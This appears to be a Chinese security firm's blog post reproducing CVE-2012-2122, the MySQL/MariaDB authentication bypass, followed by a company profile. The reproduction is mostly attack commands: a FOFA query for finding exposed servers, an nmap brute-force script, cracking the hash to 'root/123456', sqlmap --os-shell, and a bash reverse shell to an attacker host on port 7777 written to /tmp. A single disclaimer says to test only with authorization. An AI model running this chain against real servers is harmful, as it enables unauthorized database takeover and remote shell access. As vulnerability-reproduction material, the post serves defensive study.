0x01 漏洞描述
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle 旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(Relational Database Management System,关系数据库管理系统) 应用软件之一。当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞。
0x02 漏洞复现
漏洞影响:所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22
FOFA: app="mysql"
1.nmap使用mysql-vuln-cve2012-2122爆破Mysql,得到一个mysql5加密值
6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
nmap -sV -T4 -p3306 --script=mysql-vuln-cve2012-2122 x.x.x.x
2.到CMD5解密,得到密码为123456,即账号:root 密码:123456
CMD5地址为:https://www.cmd5.com/
3.利用sqlmap连接,连接成功,权限为mysql
sqlmap -d "mysql://root:[email protected]:3306/test" --os-shell --flush-session
4.写入反弹shell的sh脚本到tmp目录,且赋予可执行权限,写入成功
echo "bash -i >& /dev/tcp/x.x.x.x/7777 0>&1" > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论